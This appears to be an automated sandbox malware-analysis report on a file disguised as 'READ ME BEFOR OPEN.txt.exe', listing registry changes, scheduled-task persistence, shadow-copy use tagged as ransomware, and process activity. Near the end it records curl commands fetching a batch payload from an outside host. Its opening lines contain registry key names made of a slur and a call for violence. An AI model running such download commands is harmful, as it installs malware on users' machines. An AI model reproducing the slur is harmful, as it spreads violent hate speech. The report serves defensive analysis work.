Key created \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Software C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4464 wrote to memory of 5228 N/A C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
PID 4464 wrote to memory of 5228 N/A C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
PID 4464 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
PID 4464 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
PID 4464 wrote to memory of 6116 N/A C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe C:\Windows\system32\cmd.exe
PID 4464 wrote to memory of 6116 N/A C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe C:\Windows\system32\cmd.exe
PID 6116 wrote to memory of 3076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 6116 wrote to memory of 3076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 6116 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 6116 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 6116 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 6116 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 6116 wrote to memory of 5288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 6116 wrote to memory of 5288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 4764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\openfiles.exe
PID 4896 wrote to memory of 4764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\openfiles.exe
PID 5288 wrote to memory of 4716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\openfiles.exe
PID 5288 wrote to memory of 4716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\openfiles.exe
PID 4896 wrote to memory of 4972 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4896 wrote to memory of 4972 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5288 wrote to memory of 4832 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5288 wrote to memory of 4832 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4896 wrote to memory of 5136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4896 wrote to memory of 5136 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 5288 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 5288 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 5228 wrote to memory of 5292 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5228 wrote to memory of 5292 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4896 wrote to memory of 1904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1904 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 4512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 4512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4896 wrote to memory of 3632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 5228 wrote to memory of 692 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5228 wrote to memory of 692 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4896 wrote to memory of 3860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 132 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 132 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 2428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 5228 wrote to memory of 5936 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5228 wrote to memory of 5936 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4896 wrote to memory of 5580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 4896 wrote to memory of 5580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 4896 wrote to memory of 1668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 4896 wrote to memory of 1668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 4896 wrote to memory of 3532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4896 wrote to memory of 3532 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4896 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\attrib.exe N/A
N/A N/A C:\Windows\System32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe

"C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe"

C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe

"C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"

C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe

"C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "

C:\Windows\system32\curl.exe

curl -o ModMenu.bat https://sky-aerial-derby.glitch.me/ModMenu.bat

C:\Windows\system32\curl.exe

curl -o hig.bat https://sky-aerial-derby.glitch.me/ModMenu.bat

